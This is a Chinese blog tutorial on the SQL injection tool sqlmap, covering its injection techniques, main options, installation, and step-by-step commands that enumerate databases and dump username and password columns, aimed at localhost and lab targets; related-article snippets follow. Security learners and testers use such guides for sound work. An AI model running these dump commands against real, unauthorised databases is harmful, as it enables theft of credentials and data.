sqlmap的使用详细讲解

已于 2023-05-29 12:25:10 修改
阅读量2.5k 收藏 2
点赞数
分类专栏: MySQL数据库 网络运维与安全 文章标签: 数据库
于 2023-05-29 12:25:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mogexiuluo/article/details/130925607
版权

一、sqlmap介绍


  简介:是一个自动化的sql注入工具,主要功能扫描、发现并利用给定的
        url的sql注入漏洞,内置了很多插件
  sqlmap支持的数据库: MySQL、oracle、sql-server、DB2....
  注意:sqlmap只用来检测和sql注入,不能扫描网站的漏洞
sqlmap使用的sql注入方式:
    1、基于布尔类型盲注:可以根据页面的返回判断条件真假的注入
    2、基于时间的盲注;根据页面返回内容判断,延迟时间是否执行
    3、基于报错注入:根据页面返回的错误信息
    4、联合查询注入:根据使用的union的情况下注入

sqlmap的简单使用:
  -u  url:  检测的注入点
  --dbs:   列出所有数据库的名称
  --current-db: 列出当前的数据库名称
  -D:   指定的一个数据库
  --tables:  列出数据库表名称
  -T:   指定的一个表名称
  --columns: 列出所有的字段名
  -C:    指定字段
  --dump:  列出字段的内容
  --users: 获取数据所有的用户信息

安装sqlmap:


  1、安装Python2.7 ,新建一个目录:python2.7
  2、双击Python安装包,安装到python2.7目录
  3、将python2.7添加环境变量
  4、解压sqlmap1.5压缩包到D盘:d:/sqlmap
  5、win+R 输入cmd 进入到D盘
        C:\Users\xiaolin>d:
        D:\>cd sqlmap
        D:\sqlmap>sqlmap.py  回车,如果出现sqlmap图标说明成功


           
二、使用sqlmap


 1、获取数据库的所有数据库名称
 sqlmap.py  sqlmap -u http://127.0.0.1/xxx --dbs
 2、获取当前的数据库名称
 sqlmap.py  sqlmap -u http://127.0.0.1/xx --current-db
    获取到的数据库名称: news
 3、获取当前的数据库news所有表名称
 sqlmap.py  sqlmap -u http://127.0.0.1/xx -D news --tables
 4、获取当前的数据库news下news_users表所有字段名称
 sqlmap.py  sqlmap -u http://127.0.0.1/nxxx -D news -T news_users --columns
 5、获取news库下的news_users表的数据
 sqlmap.py  sqlmap -u http://127.0.0.1/nxxx -D news -T news_users -C username,password --dump

 

 

 

 

获取MySQL数据库管理员信息: 
sqlmap.py  sqlmap -u http://127.0.0.1/nxx -D mysql -T  user --dump
 
sqlmap.py  sqlmap -u http://127.0.0.1/xx -D  information_schema  -T tables -C TABLE_NAME,TABLE_SCHEMA --dump
 

mogexiuluo
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap自动扫描工具
06-14
sqlmap扫描工具
sqlmap tamper脚本_sqlmap 详解
weixin_39926103的博客
11-26 269
Sqlmap是一款非常强大的SQL注入工具。下载地址http://sqlmap.org/简介sqlmap支持以下五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。4、联合...
SQLmap使用教程图文教程(超详细
wangyuxiang946的博客
06-20 3万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
03-13 1477
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。会清空之前的session,重新测试该目标。
SQLMap工具-1】SQLMap简介及简单应用实例
m0_64378913的博客
04-27 4万+
1 SQLMap简介 SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 注意:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。 SQLMap
SQLMAP简介及使用方式
weixin_61862241的博客
05-06 8960
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库;基于布尔类型的注入,即可根据返回页面判断条件真假的注入;基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假;
sqlmap使用教程大全命令大全(图文)
热门推荐
Cwillchris的博客
03-15 6万+
我们先准备一个靶机,我这里拿经典的SQL大观园靶机 我们再url后面传参http://192.168.98.100/sqli-labs/Less-1/?id=1 接下来我们用此url进行SQLmap的教学http://192.168.98.100/sqli-labs/Less-1/?id=1 一、SQLmap基础操作 1.判断是否存在注入 假设目标注入点是http://192.168.98.100/sqli-labs/Less-1/?id=1,判断具是否存在注入的命令如下所示.
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
dzqxwzoe的博客
09-05 7982
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用数据库4、查看「数据表」5、查看「字段」6、查看「数据」
SQLmap
qq_41638872的博客
06-23 1507
SQLmap使用
SQLMAP使用笔记全集
05-20
收录了SQLmap使用笔记,使用方法,以及讲解实例,是学习使用sqlmap应用工具的好材料
sqlmap使用手记
03-01
sqlmap使用手记,讲解sqlmap使用方法等等
使用sqlmap绕过过滤
08-05
该文档讲解了如何使用sqlmap绕过过滤手段的方法,有兴趣的可以下载看看
sql注入攻击之sqlmap
06-10
手工进行sql注入对于初学者有一定的难度,本节课程针对于信息安全小白讲解怎么使用sqlmap来进行sql注入,结合前面章节将的内容可以的判断互联网上网站是否存在sql注入。
SQLMap使用详解
未完成的歌~的博客
02-19 2万+
文章目录前言:一、SQLMap介绍1、Sqlmap简介:2、Sqlmap支持的注入方式:二、SQLMap安装三、SQLMap使用:1、判断是否存在注入:2、判断文本中的请求是否存在注入:3、查询当前用户下的所有数据库:4、获取数据库中的表名:5、获取表中的字段名:6、获取字段内容:7、获取数据库的所有用户:8、获取数据库用户的密码:9、获取当前网站数据库的名称:10、获取当前网站数据库的用户名称:四、SQLMap进阶:参数讲解1、-- level 5:探测等级2、-- is-dba:当前用户是否为管理权限3
Sqlmap 使用方法小结
0verWatch的博客
08-02 2万+
平常的使用GET方法像–tables –columns -T -D –dbs –dump 啥的就不说了,只是博客几天不发,空着不好,还是得写写东西 --is-dba 当前用户权限(是否为root权限,mssql下最高权限为sa) --dbs 所有数据库 --current-db 网站当前数据库 --users 所有数据库用户 --current-user 当前数据库用户 --random-age...
一文了解SQLMap
allintao的博客
02-27 2198
SQLMap是一款开源的渗透测试工具,可用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器 的权限等操作 SQLMap支持的数据库有:MySQL、Oracle、Microsoft SQL Server、Microsoft Access,IBM DB2、 SQLite等主流数据库 检测类型:union联合查询注入、布尔盲注、时间盲注、报错注入、堆叠注入。
史上最详细sqlmap入门教程
weixin_44867191的博客
05-16 9032
最近做安全测试,遇到了SQL盲注的漏洞,从发现漏洞,确认漏洞,协助开发复现漏洞,验证漏洞一整套流程下来,有了亿点点收获,下面分享给大家,希望对软件测试同学有所启发,难度不大,小白看完也能上手的那种。
sqlmap工具全面学习
weixin_43114209的博客
02-27 5968
SQLMap是一款用于检测和利用SQL注入漏洞的自动化工具。它可以对各种类型的SQL注入漏洞进行探测和攻击,并提供了多种攻击技术和方法,包括基于时间、布尔逻辑、错误信息等的盲注攻击,以及利用文件系统和操作系统的命令执行等高级攻击。SQL注入漏洞是一种常见的Web安全漏洞,攻击者可以通过注入恶意的SQL语句来绕过身份认证、访问敏感信息或者控制数据库服务器。SQLMap能够自动化地探测和利用这些漏洞,极大地简化了渗透测试人员的工作。
sqlmap详细讲解
A485860941的博客
04-13 3万+
sqlmap详细讲解,不看后悔一辈子,据说百分之99的人看了都夸赞.
sqllibs sqlmap
09-29
sqllibs是一个用于学习和练习SQL注入的在线实验平台。完成sqllibs的前18关可以帮助你掌握更多的方法来进行SQL注入。关于sqllibs的安装,你可以参考以下步骤: 1. 首先,下载sqllibs的源代码,可以在GitHub上找到。 2. 将下载的源代码解压到你选择的目录中。 3. 进入解压后的目录,执行安装命令,例如`pip install -r requirements.txt`。 4. 安装完所有依赖项后,运行sqllibs应用程序。 5. 在浏览器中访问sqllibs的网址,开始进行SQL注入的学习和练习。 至于sqlmap,它是一个自动化的SQL注入工具,可以帮助你发现和利用SQL注入漏洞。下面是使用sqlmap进行注入的示例命令: ``` python3 sqlmap.py -u "http://127.0.0.1/sqlilab/sqli-labs-master/Less-7/?id=1" --dump -D "security" -T "users" -C "password,username" ``` 这个命令将会对指定的URL进行SQL注入测试,并且在成功注入后,抓取并显示"security"数据库中"users"表中的"password"和"username"字段的数据。 通过使用上述命令,你可以开始利用sqlmap进行SQL注入测试和数据抓取。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值